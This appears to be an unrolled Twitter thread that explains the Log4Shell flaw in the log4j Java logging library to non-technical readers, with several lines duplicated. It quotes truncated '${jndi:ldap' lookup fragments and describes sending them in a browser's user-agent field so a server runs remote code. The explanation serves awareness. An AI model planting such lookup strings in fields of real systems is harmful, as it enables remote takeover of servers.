Explaining #log4j for non technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there
#Log4Shell #log4jRCE
⬇️
#Log4Shell #log4jRCE
⬇️
Log4j is a popular logging library used in Java programming language.
A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (firefox, chrome, edge... ), when you made the request, what page you accessed... and more!
So, this log4j library is used in A LOT of Java software, and there is approximately 3 billion devices that runs Java. Quick math: that's huge.
Log4j is present in web servers, your phones, possibly on your smart fridge and plenty other places...
Log4j is present in web servers, your phones, possibly on your smart fridge and plenty other places...
A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything.
One of the things it does is look for patterns like ${something} and will try to replace it with another piece of information.
It is used to add context, for example ${date} would be replaced by today's date.
(I have no idea if this example works, it's just to keep it simple)
It is used to add context, for example ${date} would be replaced by today's date.
(I have no idea if this example works, it's just to keep it simple)
So when there's a ${jndi: pattern, it will try to replace it.
Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet, we just have to tell it where to get the data from.
This data can be a malicious software.
Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet, we just have to tell it where to get the data from.
This data can be a malicious software.
Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j.
Which means that at this point hackers can make the targeted computer do (almost) whatever they want
Which means that at this point hackers can make the targeted computer do (almost) whatever they want
This gets really bad because we don't need to know which computer to target.
Remember when I said the web servers logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
Remember when I said the web servers logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing.
So... yeah. #log4j
So... yeah. #log4j
• • •
Missing some Tweet in this thread? You can try to
force a refresh
